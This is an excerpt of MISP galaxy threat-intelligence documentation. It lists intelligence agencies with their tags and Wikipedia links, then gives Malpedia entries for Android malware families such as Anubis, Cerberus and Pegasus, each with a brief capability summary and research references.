The tag is: misp-galaxy:intelligence-agency="Foreign Intelligence Service of Ukraine"

Table 1994. Table References

Links

https://en.wikipedia.org/wiki/Foreign_Intelligence_Service_of_Ukraine

State Bureau of Investigation (Ukraine)

State Bureau of Investigation – Derzhavne Biuro Rozsliduvan (DBR)

The tag is: misp-galaxy:intelligence-agency="State Bureau of Investigation (Ukraine)"

Table 1995. Table References

Links

https://en.wikipedia.org/wiki/State_Bureau_of_Investigation_(Ukraine)

Security Service of Ukraine

Security Service of Ukraine – Sluzhba Bezpeky Ukrayiny (SBU)

The tag is: misp-galaxy:intelligence-agency="Security Service of Ukraine"

Table 1996. Table References

Links

https://en.wikipedia.org/wiki/Security_Service_of_Ukraine

Signals Intelligence Agency

Signals Intelligence Agency (SIA)

The tag is: misp-galaxy:intelligence-agency="Signals Intelligence Agency"

Table 1997. Table References

Links

https://en.wikipedia.org/wiki/Signals_Intelligence_Agency

Joint Intelligence Organisation (United Kingdom)

Joint Intelligence Organisation (JIO)[32] – Joint intelligence analysis.

The tag is: misp-galaxy:intelligence-agency="Joint Intelligence Organisation (United Kingdom)"

Table 1998. Table References

Links

https://en.wikipedia.org/wiki/Joint_Intelligence_Organisation_(United_Kingdom)

MI5

Security Service/MI5[33] – Domestic counter terrorism and counter espionage intelligence gathering and analysis.

The tag is: misp-galaxy:intelligence-agency="MI5"

Table 1999. Table References

Links

https://en.wikipedia.org/wiki/MI5

Office for Security and Counter-Terrorism

Office for Security and Counter-Terrorism (OSCT) – Counter terrorism and protecting critical national infrastructure.

The tag is: misp-galaxy:intelligence-agency="Office for Security and Counter-Terrorism"

Table 2000. Table References

Links

https://en.wikipedia.org/wiki/Office_for_Security_and_Counter-Terrorism

National Domestic Extremism and Disorder Intelligence Unit

National Domestic Extremism and Disorder Intelligence Unit (NDEDIU)[34] – Domestic counter extremism and public disorder intelligence gathering and analysis.

The tag is: misp-galaxy:intelligence-agency="National Domestic Extremism and Disorder Intelligence Unit"

Table 2001. Table References

Links

https://en.wikipedia.org/wiki/National_Domestic_Extremism_and_Disorder_Intelligence_Unit

National Ballistics Intelligence Service

National Ballistics Intelligence Service (NBIS)[35] – Illegal firearms intelligence analysis.

The tag is: misp-galaxy:intelligence-agency="National Ballistics Intelligence Service"

Table 2002. Table References

Links

https://en.wikipedia.org/wiki/National_Ballistics_Intelligence_Service

National Fraud Intelligence Bureau

National Fraud Intelligence Bureau (NFIB)[36] – Economic crime intelligence gathering and analysis.

The tag is: misp-galaxy:intelligence-agency="National Fraud Intelligence Bureau"

Table 2003. Table References

Links

https://en.wikipedia.org/wiki/National_Fraud_Intelligence_Bureau

Secret Intelligence Service

Secret Intelligence Service (SIS)/MI6[37] – Foreign intelligence gathering and analysis.

The tag is: misp-galaxy:intelligence-agency="Secret Intelligence Service"

Table 2004. Table References

Links

https://en.wikipedia.org/wiki/Secret_Intelligence_Service

Defence Intelligence

Defence Intelligence (DI)[38] – Military intelligence analysis.

The tag is: misp-galaxy:intelligence-agency="Defence Intelligence"

Table 2005. Table References

Links

https://en.wikipedia.org/wiki/Defence_Intelligence

Government Communications Headquarters

Government Communications Headquarters (GCHQ)[39] – Signals intelligence gathering and analysis.

The tag is: misp-galaxy:intelligence-agency="Government Communications Headquarters"

Table 2006. Table References

Links

https://en.wikipedia.org/wiki/Government_Communications_Headquarters

National Crime Agency

National Crime Agency (NCA)[40] – Organised crime intelligence gathering and analysis. The agency makes use of unexplained wealth orders and the Investigatory Powers Act 2016.[41][42] NCA officers are posted overseas in around 50 countries.[43] The agency also operates the UK Protected Persons Service, which includes witness protection.[44]

The tag is: misp-galaxy:intelligence-agency="National Crime Agency"

Table 2007. Table References

Links

https://en.wikipedia.org/wiki/National_Crime_Agency

Gangmasters and Labour Abuse Authority

Gangmasters and Labour Abuse Authority - Human trafficking, slavery, economic, and serious organised crime.

The tag is: misp-galaxy:intelligence-agency="Gangmasters and Labour Abuse Authority"

Table 2008. Table References

Links

https://en.wikipedia.org/wiki/Gangmasters_and_Labour_Abuse_Authority

Director of National Intelligence

Office of the Director of National Intelligence (ODNI)

The tag is: misp-galaxy:intelligence-agency="Director of National Intelligence"

Table 2009. Table References

Links

https://en.wikipedia.org/wiki/Director_of_National_Intelligence

Central Intelligence Agency

Central Intelligence Agency (CIA)

The tag is: misp-galaxy:intelligence-agency="Central Intelligence Agency"

Table 2010. Table References

Links

https://en.wikipedia.org/wiki/Central_Intelligence_Agency

Defense Intelligence Agency

Defense Intelligence Agency (DIA)

The tag is: misp-galaxy:intelligence-agency="Defense Intelligence Agency"

Table 2011. Table References

Links

https://en.wikipedia.org/wiki/Defense_Intelligence_Agency

National Security Agency

National Security Agency (NSA)

The tag is: misp-galaxy:intelligence-agency="National Security Agency"

Table 2012. Table References

Links

https://en.wikipedia.org/wiki/National_Security_Agency

National Geospatial-Intelligence Agency

National Geospatial-Intelligence Agency (NGA)

The tag is: misp-galaxy:intelligence-agency="National Geospatial-Intelligence Agency"

Table 2013. Table References

Links

https://en.wikipedia.org/wiki/National_Geospatial-Intelligence_Agency

National Reconnaissance Office

National Reconnaissance Office (NRO)

The tag is: misp-galaxy:intelligence-agency="National Reconnaissance Office"

Table 2014. Table References

Links

https://en.wikipedia.org/wiki/National_Reconnaissance_Office

Military Intelligence Corps (United States Army)

Military Intelligence Corps (MIC)

The tag is: misp-galaxy:intelligence-agency="Military Intelligence Corps (United States Army)"

Table 2015. Table References

Links

https://en.wikipedia.org/wiki/Military_Intelligence_Corps_(United_States_Army)

Marine Corps Intelligence

Marine Corps Intelligence (MCI)

The tag is: misp-galaxy:intelligence-agency="Marine Corps Intelligence"

Table 2016. Table References

Links

https://en.wikipedia.org/wiki/Marine_Corps_Intelligence

Office of Naval Intelligence

Office of Naval Intelligence (ONI)

The tag is: misp-galaxy:intelligence-agency="Office of Naval Intelligence"

Table 2017. Table References

Links

https://en.wikipedia.org/wiki/Office_of_Naval_Intelligence

Sixteenth Air Force

Sixteenth Air Force (16 AF)

The tag is: misp-galaxy:intelligence-agency="Sixteenth Air Force"

Table 2018. Table References

Links

https://en.wikipedia.org/wiki/Sixteenth_Air_Force

Space Delta 18

Space Delta 18 (DEL 18)

The tag is: misp-galaxy:intelligence-agency="Space Delta 18"

Table 2019. Table References

Links

https://en.wikipedia.org/wiki/Space_Delta_18

Office of Intelligence and Counterintelligence

Office of Intelligence and Counterintelligence (OICI)

The tag is: misp-galaxy:intelligence-agency="Office of Intelligence and Counterintelligence"

Table 2020. Table References

Links

https://en.wikipedia.org/wiki/Office_of_Intelligence_and_Counterintelligence

Coast Guard Intelligence

Coast Guard Intelligence (CGI)

The tag is: misp-galaxy:intelligence-agency="Coast Guard Intelligence"

Table 2021. Table References

Links

https://en.wikipedia.org/wiki/Coast_Guard_Intelligence

DHS Office of Intelligence and Analysis

DHS Office of Intelligence and Analysis (I&A)

The tag is: misp-galaxy:intelligence-agency="DHS Office of Intelligence and Analysis"

Table 2022. Table References

Links

https://en.wikipedia.org/wiki/DHS_Office_of_Intelligence_and_Analysis

DEA Office of National Security Intelligence

DEA Office of National Security Intelligence (ONSI)

The tag is: misp-galaxy:intelligence-agency="DEA Office of National Security Intelligence"

Table 2023. Table References

Links

https://en.wikipedia.org/wiki/DEA_Office_of_National_Security_Intelligence

FBI Intelligence Branch

FBI Intelligence Branch (IB)

The tag is: misp-galaxy:intelligence-agency="FBI Intelligence Branch"

Table 2024. Table References

Links

https://en.wikipedia.org/wiki/FBI_Intelligence_Branch

Bureau of Intelligence and Research

Bureau of Intelligence and Research (IR)

The tag is: misp-galaxy:intelligence-agency="Bureau of Intelligence and Research"

Table 2025. Table References

Links

https://en.wikipedia.org/wiki/Bureau_of_Intelligence_and_Research

Office of Terrorism and Financial Intelligence

Office of Terrorism and Financial Intelligence (TFI)

The tag is: misp-galaxy:intelligence-agency="Office of Terrorism and Financial Intelligence"

Table 2026. Table References

Links

https://en.wikipedia.org/wiki/Office_of_Terrorism_and_Financial_Intelligence

es:Secretaría de Inteligencia Estratégica de Estado

State Secretariat of Strategic Intelligence - Secretaría de Inteligencia Estratégica de Estado (SIEE)

The tag is: misp-galaxy:intelligence-agency="es:Secretaría de Inteligencia Estratégica de Estado"

es:Secretaría de Inteligencia Estratégica de Estado is also known as:

  • Secretaría de Inteligencia Estratégica de Estado

Table 2027. Table References

Links

https://es.wikipedia.org/wiki/Secretar%C3%ADa_de_Inteligencia_Estrat%C3%A9gica_de_Estado

National Directorate of Information and Intelligence - Dirección Nacional de Información e Inteligencia (DNII)

National Directorate of Information and Intelligence - Dirección Nacional de Información e Inteligencia (DNII)

The tag is: misp-galaxy:intelligence-agency="National Directorate of Information and Intelligence - Dirección Nacional de Información e Inteligencia (DNII)"

State Security Service (Uzbekistan)

State Security Service - Davlat Xavfsizlik Xizmati (DXX)/ Служба государственной безопасности (СГБ)

The tag is: misp-galaxy:intelligence-agency="State Security Service (Uzbekistan)"

Table 2028. Table References

Links

https://en.wikipedia.org/wiki/State_Security_Service_(Uzbekistan)

Bolivarian National Intelligence Service

Bolivarian National Intelligence Service - Servicio Bolivariano de Inteligencia (SEBIN)

The tag is: misp-galaxy:intelligence-agency="Bolivarian National Intelligence Service"

Table 2029. Table References

Links

https://en.wikipedia.org/wiki/Bolivarian_National_Intelligence_Service

Dirección General de Contrainteligencia Militar

Directorate General of Military Intelligence – Dirección General de Contrainteligencia Militar (DGCIM)

The tag is: misp-galaxy:intelligence-agency="Dirección General de Contrainteligencia Militar"

Table 2030. Table References

Links

https://en.wikipedia.org/wiki/Direcci%C3%B3n_General_de_Contrainteligencia_Militar

General Department of Military Intelligence

General Department of Defence Intelligence (GDDI)/General Department II - Tổng cục Tình báo Quốc phòng (TBQP)/Tổng cục II (TC2)

The tag is: misp-galaxy:intelligence-agency="General Department of Military Intelligence"

Table 2031. Table References

Links

https://en.wikipedia.org/wiki/General_Department_of_Military_Intelligence

Political Security Organization

Political Security Organization (PSO)

The tag is: misp-galaxy:intelligence-agency="Political Security Organization"

Table 2032. Table References

Links

https://en.wikipedia.org/wiki/Political_Security_Organization

National Security Bureau (Yemen)

National Security Bureau (NSB)

The tag is: misp-galaxy:intelligence-agency="National Security Bureau (Yemen)"

Table 2033. Table References

Links

https://en.wikipedia.org/wiki/National_Security_Bureau_(Yemen)

Central Intelligence Organisation

Central Intelligence Organisation (CIO)

The tag is: misp-galaxy:intelligence-agency="Central Intelligence Organisation"

Table 2034. Table References

Links

https://en.wikipedia.org/wiki/Central_Intelligence_Organisation

Counter Terrorism Group

Counter Terrorism Group (CTG)

The tag is: misp-galaxy:intelligence-agency="Counter Terrorism Group"

Table 2035. Table References

Links

https://en.wikipedia.org/wiki/Counter_Terrorism_Group

European Union Military Staff

European Union Military Staff (EUMS)

The tag is: misp-galaxy:intelligence-agency="European Union Military Staff"

Table 2036. Table References

Links

https://en.wikipedia.org/wiki/European_Union_Military_Staff

European Union Satellite Centre

European Union Satellite Centre (EU SatCen)

The tag is: misp-galaxy:intelligence-agency="European Union Satellite Centre"

Table 2037. Table References

Links

https://en.wikipedia.org/wiki/European_Union_Satellite_Centre

Regional Anti-Terrorist Structure

Regional Anti-Terrorist Structure (RATS)

The tag is: misp-galaxy:intelligence-agency="Regional Anti-Terrorist Structure"

Table 2038. Table References

Links

https://en.wikipedia.org/wiki/Regional_Anti-Terrorist_Structure

Malpedia

Malware galaxy cluster based on Malpedia.

Malpedia is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Davide Arcuri - Alexandre Dulaunoy - Steffen Enders - Andrea Garavaglia - Andras Iklody - Daniel Plohmann - Christophe Vandeplas

FastCash

The tag is: misp-galaxy:malpedia="FastCash"

FastCash is also known as:

Table 2039. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/aix.fastcash

https://i.blackhat.com/USA-20/Wednesday/us-20-Perlow-FASTCash-And-INJX_Pure-How-Threat-Actors-Use-Public-Standards-For-Financial-Fraud-wp.pdf

https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/

https://www.symantec.com/blogs/threat-intelligence/fastcash-lazarus-atm-malware

https://www.youtube.com/watch?v=zGvQPtejX9w

https://www.us-cert.gov/ncas/alerts/TA18-275A

https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf

https://i.blackhat.com/eu-20/Wednesday/eu-20-Rivera-From-Zero-To-Sixty-The-Story-Of-North-Koreas-Rapid-Ascent-To-Becoming-A-Global-Cyber-Superpower.pdf

https://symantec-blogs.broadcom.com/blogs/threat-intelligence/fastcash-lazarus-atm-malware

https://threatrecon.nshc.net/2019/01/23/sectora01-custom-proxy-utility-tool-analysis/

https://www.cisa.gov/uscert/ncas/alerts/TA18-275A

https://www.cisa.gov/uscert/ncas/alerts/aa20-239a

https://www.cisa.gov/uscert/sites/default/files/publications/AA22-108A-TraderTraitor-North_Korea_APT_Targets_Blockchain_Companies.pdf

https://www.youtube.com/watch?v=LUxOcpIRxmg

https://github.com/fboldewin/FastCashMalwareDissected/

https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html

https://i.blackhat.com/USA-20/Wednesday/us-20-Perlow-FASTCash-And-INJX_Pure-How-Threat-Actors-Use-Public-Standards-For-Financial-Fraud.pdf

888 RAT

The tag is: misp-galaxy:malpedia="888 RAT"

888 RAT is also known as:

Table 2040. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.888_rat

https://www.welivesecurity.com/2021/09/07/bladehawk-android-espionage-kurdish/

AbstractEmu

According to PCrisk, AbstractEmu is the name of rooting malware that can gain privileged access to the Android operating system. Threat actors behind AbstractEmu are using legitimate-looking apps (like password managers, app launchers, data savers) to trick users into downloading and opening/executing this malware.

The tag is: misp-galaxy:malpedia="AbstractEmu"

AbstractEmu is also known as:

Table 2042. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.abstract_emu

https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord

https://blog.lookout.com/lookout-discovers-global-rooting-malware-campaign

https://www.sentinelone.com/labs/the-art-and-science-of-macos-malware-hunting-with-radare2-leveraging-xrefs-yara-and-zignatures/

Agent Smith

The tag is: misp-galaxy:malpedia="Agent Smith"

Agent Smith is also known as:

Table 2046. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.agentsmith

https://research.checkpoint.com/2019/agent-smith-a-new-species-of-mobile-malware/

AhMyth

According to PCrisk, Ahmyth is a Remote Access Trojan (RAT) targeting Android users. It is distributed via trojanized (fake) applications. Ahmyth RAT steals cryptocurrency and banking credentials, 2FA codes, lock screen passcodes, and captures screenshots.

The tag is: misp-galaxy:malpedia="AhMyth"

AhMyth is also known as:

Table 2047. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.ahmyth

https://www.welivesecurity.com/2019/08/22/first-spyware-android-ahmyth-google-play/

https://www.secrss.com/articles/24995

https://mp.weixin.qq.com/s/J_A12SOX0k5TOYFAegBv_w

https://www.stratosphereips.org/blog/2020/11/10/android-mischief-rats-dataset

https://deform.co/hacker-group-caracal-kitten-targets-kdp-activists-with-malware/

https://securelist.com/transparent-tribe-part-2/98233/

Anubis (Android)

BleepingComputer found that Anubis will display fake phishing login forms when users open up apps for targeted platforms to steal credentials. This overlay screen will be shown over the real app’s login screen to make victims think it’s a legitimate login form when in reality, inputted credentials are sent to the attackers.

In the new version spotted by Lookout, Anubis now targets 394 apps and has the following capabilities:

  • Recording screen activity and sound from the microphone

  • Implementing a SOCKS5 proxy for covert communication and package delivery

  • Capturing screenshots

  • Sending mass SMS messages from the device to specified recipients

  • Retrieving contacts stored on the device

  • Sending, reading, deleting, and blocking notifications for SMS messages received by the device

  • Scanning the device for files of interest to exfiltrate

  • Locking the device screen and displaying a persistent ransom note

  • Submitting USSD code requests to query bank balances

  • Capturing GPS data and pedometer statistics

  • Implementing a keylogger to steal credentials

  • Monitoring active apps to mimic and perform overlay attacks

  • Stopping malicious functionality and removing the malware from the device

The tag is: misp-galaxy:malpedia="Anubis (Android)"

Anubis (Android) is also known as:

  • BankBot

  • android.bankbot

  • android.bankspy

Table 2052. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.anubis

https://intel-honey.medium.com/reversing-anubis-malware-93f28d154bbb

https://labs.bitdefender.com/2020/03/android-apps-and-malware-capitalize-on-coronavirus

https://www.threatfabric.com/blogs/the-rage-of-android-banking-trojans.html

https://0x1c3n.tech/anubis-android-malware-analysis

https://bushidotoken.blogspot.com/2020/05/turkey-targeted-by-cerberus-and-anubis.html

https://community.riskiq.com/article/85b3db8c

https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/

https://assets.virustotal.com/reports/2021trends.pdf

https://muha2xmad.github.io/malware-analysis/anubis/

https://www.welivesecurity.com/2017/11/21/new-campaigns-spread-banking-malware-google-play/

https://www.threatfabric.com/blogs/2020_year_of_the_rat.html

https://info.phishlabs.com/blog/new-variant-bankbot-banking-trojan-aubis

https://n1ght-w0lf.github.io/malware%20analysis/anubis-banking-malware/

http://blog.koodous.com/2017/05/bankbot-on-google-play.html

https://blog.trendmicro.com/trendlabs-security-intelligence/google-play-apps-drop-anubis-banking-malware-use-motion-based-evasion-tactics/

https://securelist.com/mobile-malware-evolution-2019/96280/

https://securityboulevard.com/2018/09/android-malware-intercepts-sms-2fa-we-have-the-logs/

http://blog.koodous.com/2017/04/decrypting-bankbot-communications.html

https://pentest.blog/n-ways-to-unpack-mobile-malware/

https://sysopfb.github.io/malware,/reverse-engineering/2018/08/30/Unpacking-Anubis-APK.html

https://www.fortinet.com/blog/threat-research/a-look-into-the-new-strain-of-bankbot.html

http://b0n1.blogspot.de/2017/05/tracking-android-bankbot.html

https://www.youtube.com/watch?v=U0UsfO-0uJM

https://www.fortinet.com/blog/threat-research/bankbot-the-prequel.html

https://eybisi.run/Mobile-Malware-Analysis-Tricks-used-in-Anubis/

https://securityintelligence.com/after-big-takedown-efforts-20-more-bankbot-mobile-malware-apps-make-it-into-google-play/

https://securityaffairs.co/wordpress/133115/hacking/anubis-networks-new-c2.html

Ashas

The tag is: misp-galaxy:malpedia="Ashas"

Ashas is also known as:

Table 2055. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.ashas

https://www.welivesecurity.com/2019/10/24/tracking-down-developer-android-adware/

ATANK

According to Lukas Stefanko, this is an open-source crypto-ransomware found on GitHub in 2018. It can encrypt and decrypt files (AES; the key is 32 random characters, sent to the C&C), uses email as the contact point, but will remove all files after 24 hours or after a reboot.

The tag is: misp-galaxy:malpedia="ATANK"

ATANK is also known as:

Table 2056. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.atank

https://twitter.com/LukasStefanko/status/1268070798293708800

AxBanker

According to EnigmaSoft, AxBanker is a banking Trojan targeting Android devices specifically. The threatening tool has been deployed as part of large attack campaigns against users in India. The threat actors use smishing (SMS phishing) techniques to smuggle the malware threat onto the victims' devices. The fake applications carrying AxBanker are designed to visually impersonate the official applications of popular Indian banking organizations. The weaponized applications use fake promises or rewards and discounts as additional lures.

The tag is: misp-galaxy:malpedia="AxBanker"

AxBanker is also known as:

Table 2057. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.axbanker

https://blog.polyswarm.io/phishing-and-android-malware-campaign-targets-indian-banks

https://www.trendmicro.com/en_vn/research/22/k/massive-phishing-campaigns-target-india-banks-clients.html#::text=We%20found%20five%20banking%20malware

BADCALL (Android)

Remote access tool (RAT) payload on Android devices.

The tag is: misp-galaxy:malpedia="BADCALL (Android)"

BADCALL (Android) is also known as:

Table 2058. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.badcall

https://www.us-cert.gov/ncas/analysis-reports/ar19-252a

BadPatch

The tag is: misp-galaxy:malpedia="BadPatch"

BadPatch is also known as:

  • WelcomeChat

Table 2059. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.badpatch

https://www.welivesecurity.com/2020/07/14/welcome-chat-secure-messaging-app-nothing-further-truth/

BrasDex

According to PCrisk, BrasDex is a banking malware targeting Android operating systems. This malicious program aims to gain access to victims' bank accounts and make fraudulent transactions.

At the time of writing, BrasDex targets Brazilian banking applications exclusively. In previous BrasDex campaigns, it infiltrated devices under the guise of Android system related apps. Lately, this malware has been installed by a fake Brazilian Banco Santander banking application.

The tag is: misp-galaxy:malpedia="BrasDex"

BrasDex is also known as:

Table 2063. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.brasdex

https://www.threatfabric.com/blogs/brasdex-a-new-brazilian-ats-malware.html

BRATA

According to Cleafy, the victim’s Android device is factory reset after the attackers siphon money from the victim’s bank account. This distracts users from the crime, while removing traces or footprints that might be of interest to forensic analysts.

The tag is: misp-galaxy:malpedia="BRATA"

BRATA is also known as:

  • AmexTroll

Table 2064. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.brata

https://www.cleafy.com/cleafy-labs/brata-is-evolving-into-an-advanced-persistent-threat

https://www.threatfabric.com/blogs/brata-a-tale-of-three-families.html

https://www.cleafy.com/cleafy-labs/how-brata-is-monitoring-your-bank-account

https://securelist.com/spying-android-rat-from-brazil-brata/92775/

https://www.advintel.io/post/economic-growth-digital-inclusion-specialized-crime-financial-cyber-fraud-in-latam

https://www.cleafy.com/cleafy-labs/mobile-banking-fraud-brata-strikes-again

Brunhilda

PRODAFT describes Brunhilda as a "Dropper as a Service" for Google Play, delivering e.g. Alien.

The tag is: misp-galaxy:malpedia="Brunhilda"

Brunhilda is also known as:

Table 2065. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.brunhilda

https://www.cleafy.com/cleafy-labs/the-android-malwares-journey-from-google-play-to-banking-fraud

https://www.prodaft.com/m/reports/BrunHilda_DaaS.pdf

https://www.threatfabric.com/blogs/the-attack-of-the-droppers.html

BusyGasper

The tag is: misp-galaxy:malpedia="BusyGasper"

BusyGasper is also known as:

Table 2066. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.busygasper

https://securelist.com/busygasper-the-unfriendly-spy/87627/

CapraRAT

According to PCrisk, CapraRAT is the name of an Android remote access trojan (RAT), possibly a modified version of another (open-source) RAT called AndroRAT. It is known that CapraRAT is used by an advanced persistent threat group (APT) called APT36 (also known as Earth Karkaddan). CapraRAT allows attackers to perform certain actions on the infected Android device.

The tag is: misp-galaxy:malpedia="CapraRAT"

CapraRAT is also known as:

Table 2067. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.capra_rat

https://www.welivesecurity.com/2023/03/07/love-scam-espionage-transparent-tribe-lures-indian-pakistani-officials/

https://www.sentinelone.com/labs/capratube-transparent-tribes-caprarat-mimics-youtube-to-hijack-android-phones/

https://www.trendmicro.com/en_us/research/22/a/investigating-apt36-or-earth-karkaddans-attack-chain-and-malware.html

CarbonSteal

The tag is: misp-galaxy:malpedia="CarbonSteal"

CarbonSteal is also known as:

Table 2068. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.carbonsteal

https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf

Catelites

Catelites Bot (identified by Avast and SfyLabs in December 2017) is an Android trojan, with ties to CronBot. Once the malicious app is installed, attackers use social engineering tricks and window overlays to get credit card details from the victim. The distribution vector seems to be fake apps from third-party app stores (not Google Play) or via malvertisement. After installation and activation, the app creates fake Gmail, Google Play and Chrome icons. Furthermore, the malware sends a fake system notification, telling the victim that they need to re-authenticate with Google Services and ask for their credit card details to be entered. Currently the malware has overlays for over 2,200 apps of banks and financial institutions.

The tag is: misp-galaxy:malpedia="Catelites"

Catelites is also known as:

Table 2069. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.catelites

https://blog.avast.com/new-version-of-mobile-malware-catelites-possibly-linked-to-cron-cyber-gang

https://www.youtube.com/watch?v=1LOy0ZyjEOk

Cerberus

According to PCrisk, Cerberus is an Android banking Trojan which can be rented on hacker forums. It was created in 2019 and is used to steal sensitive, confidential information. Cerberus can also be used to send commands to users' devices and perform dangerous actions.

The tag is: misp-galaxy:malpedia="Cerberus"

Cerberus is also known as:

Table 2070. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.cerberus

https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html

https://labs.bitdefender.com/2020/09/apps-on-google-play-tainted-with-cerberus-banker-malware/

https://twitter.com/AndroidCerberus

https://bushidotoken.blogspot.com/2020/05/turkey-targeted-by-cerberus-and-anubis.html

https://community.riskiq.com/article/85b3db8c

https://www.threatfabric.com/blogs/alien_the_story_of_cerberus_demise.html

https://www.forbes.com/sites/zakdoffman/2019/08/16/dangerous-new-android-trojan-hides-from-malware-researchers-and-taunts-them-on-twitter/

https://resecurity.com/blog/article/in-the-box-mobile-malware-webinjects-marketplace

https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko

https://go.recordedfuture.com/hubfs/reports/cta-2020-1016.pdf

https://securelist.com/the-state-of-stalkerware-in-2021/106193/

https://blog.cyberint.com/cerberus-is-dead-long-live-cerberus

https://www.biznet.com.tr/wp-content/uploads/2020/08/Cerberus.pdf

https://nur.pub/cerberus-analysis

https://preyproject.com/blog/en/cerberus-and-alien-the-malware-that-has-put-android-in-a-tight-spot/

https://github.com/ics-iot-bootcamp/cerberus_research

https://insights.oem.avira.com/in-depth-analysis-of-a-cerberus-trojan-variant/

https://www.threatfabric.com/blogs/ermac-another-cerberus-reborn.html

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/04/12075509/EN_The-State-of-Stalkerware-2021.pdf

https://www.threatfabric.com/blogs/2020_year_of_the_rat.html

Chameleon

Chameleon is an Android trojan that impersonates legitimate entities to steal data from users in Australia and Poland. It abuses the Accessibility Service to monitor and modify the device screen.

The tag is: misp-galaxy:malpedia="Chameleon"

Chameleon is also known as:

Table 2071. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.chameleon

https://www.threatfabric.com/blogs/android-banking-trojan-chameleon-is-back-in-action

https://blog.cyble.com/2023/04/13/chameleon-a-new-android-malware-spotted-in-the-wild/

Chrysaor

The tag is: misp-galaxy:malpedia="Chrysaor"

Chrysaor is also known as:

  • JigglyPuff

  • Pegasus

Table 2075. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.chrysaor

https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf

https://cybergeeks.tech/a-technical-analysis-of-pegasus-for-android-part-1

https://thewire.in/rights/sar-geelani-pegasus-spyware-phone-messages

https://www.theguardian.com/news/2021/jul/18/revealed-murdered-journalist-number-selected-mexico-nso-client-cecilio-pineda-birto

https://forbiddenstories.org/pegasus-the-new-global-weapon-for-silencing-journalists/

https://forbiddenstories.org/the-pegasus-project-a-worldwide-collaboration-to-counter-a-global-crime/

https://citizenlab.ca/2020/01/stopping-the-press-new-york-times-journalist-targeted-by-saudi-linked-pegasus-spyware-operator/

https://citizenlab.ca/2022/04/catalangate-extensive-mercenary-spyware-operation-against-catalans-using-pegasus-candiru/

https://twitter.com/alexanderjaeger/status/1417447732030189569

https://nex.sx/blog/2021/08/03/the-pegasus-project.html

https://www.washingtonpost.com/technology/2021/07/18/reactions-pegasus-project-nso/

https://unit42.paloaltonetworks.com/strategically-aged-domain-detection/

https://www.theguardian.com/news/2021/jul/18/viktor-orban-using-nso-spyware-in-assault-on-media-data-suggests

https://www.theguardian.com/world/2021/jul/18/nso-spyware-used-to-target-family-of-jamal-khashoggi-leaked-data-shows-saudis-pegasus

https://github.com/AmnestyTech/investigations/tree/master/2021-07-18_nso

https://citizenlab.ca/2021/12/pegasus-vs-predator-dissidents-doubly-infected-iphone-reveals-cytrox-mercenary-spyware/

https://therecord.media/mexican-army-spyware

https://citizenlab.ca/2020/12/the-great-ipwn-journalists-hacked-with-suspected-nso-group-imessage-zero-click-exploit/

https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html

https://www.theguardian.com/world/2021/jul/18/revealed-leak-uncovers-global-abuse-of-cyber-surveillance-weapon-nso-group-pegasus

https://www.amnesty.org/en/latest/research/2021/07/forensic-methodology-report-how-to-catch-nso-groups-pegasus/

https://arkadiyt.com/2021/07/25/scanning-your-iphone-for-nso-group-pegasus-malware/

https://citizenlab.ca/2021/11/palestinian-human-rights-defenders-hacked-nso-groups-pegasus-spyware/

https://www.washingtonpost.com/world/2021/07/19/india-nso-pegasus/

https://thewire.in/government/project-pegasus-journalists-ministers-activists-phones-spying

https://www.bleepingcomputer.com/news/security/iphones-running-latest-ios-hacked-to-deploy-nso-group-spyware/

https://media.ccc.de/v/33c3-7901-pegasus_internals

https://www.vice.com/en/article/xgx5bw/amazon-aws-shuts-down-nso-group-infrastructure

https://citizenlab.ca/2021/07/amnesty-peer-review/

https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-android-technical-analysis.pdf

https://zetter.substack.com/p/pegasus-spyware-how-it-works-and

https://www.washingtonpost.com/investigations/interactive/2021/jamal-khashoggi-wife-fiancee-cellphone-hack/?itid=co_pegasus_5

https://threatpost.com/nso-pegasus-spyware-bans-apple-accountability/167965/

https://www.cyjax.com/2021/10/26/mercenary-apts-an-exploration/

https://www.lemonde.fr/projet-pegasus/article/2021/07/18/au-maroc-comme-en-france-des-journalistes-mis-sous-surveillance-avec-le-logiciel-pegasus_6088654_6088648.html

https://irpimedia.irpi.eu/sorveglianze-cy4gate/

https://security.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html

